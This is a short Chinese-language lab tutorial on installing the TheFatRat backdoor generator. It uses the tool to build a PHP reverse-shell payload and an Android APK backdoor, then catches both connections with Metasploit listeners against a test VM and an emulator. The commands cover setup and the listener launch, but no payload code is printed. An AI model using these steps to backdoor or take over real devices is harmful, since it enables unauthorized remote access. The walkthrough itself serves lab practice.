項目地址:https://github.com/Screetsec/TheFatRat
安裝TheFatRat
root@sch01ar:/sch01ar# git clone https://github.com/Screetsec/TheFatRat root@sch01ar:/sch01ar# cd TheFatRat/ && ls root@sch01ar:/sch01ar/TheFatRat# chmod +x setup.sh root@sch01ar:/sch01ar/TheFatRat# ./setup.sh
安裝完成后直接在終端輸入fatrat啟動
root@sch01ar:~# fatrat
回車
回車
回車
這是菜單界面
這里測試兩個功能,首先測試反彈電腦的
選擇1,回車
這里有多個文件類型可以選擇,我就測試php的,選擇5,回車
填寫好配置信息
在output目錄下生成了文件
將sch01ar.php移動到/var/www/html/目錄下
root@sch01ar:~# mv /sch01ar/TheFatRat/output/sch01ar.php /var/www/html/
開啟apache2服務
root@sch01ar:~# service apache2 start
開啟msf,設置好配置
然后exploit –j
用試驗機win08去訪問http://192.168.220.131/sch01ar.php
然后測試安卓的
在主菜單選擇1,然后選擇3
然后配置,填寫好ip和端口
設置payload,選擇3
選擇完后顯示配置的信息
回車
選擇y,將會生成一個后綴為rc的文件,方便以后msf連接
然后命名rc文件
回車
root@sch01ar:~# cd /sch01ar/TheFatRat/config/listeners/ && ls
root@sch01ar:/sch01ar/TheFatRat/config/listeners# msfconsole -r sch01ar.rc
啟動msf,等待着反彈就好了
打開apk在的文件夾
把apk文件放到模擬器上安裝
點擊
Msf反彈成功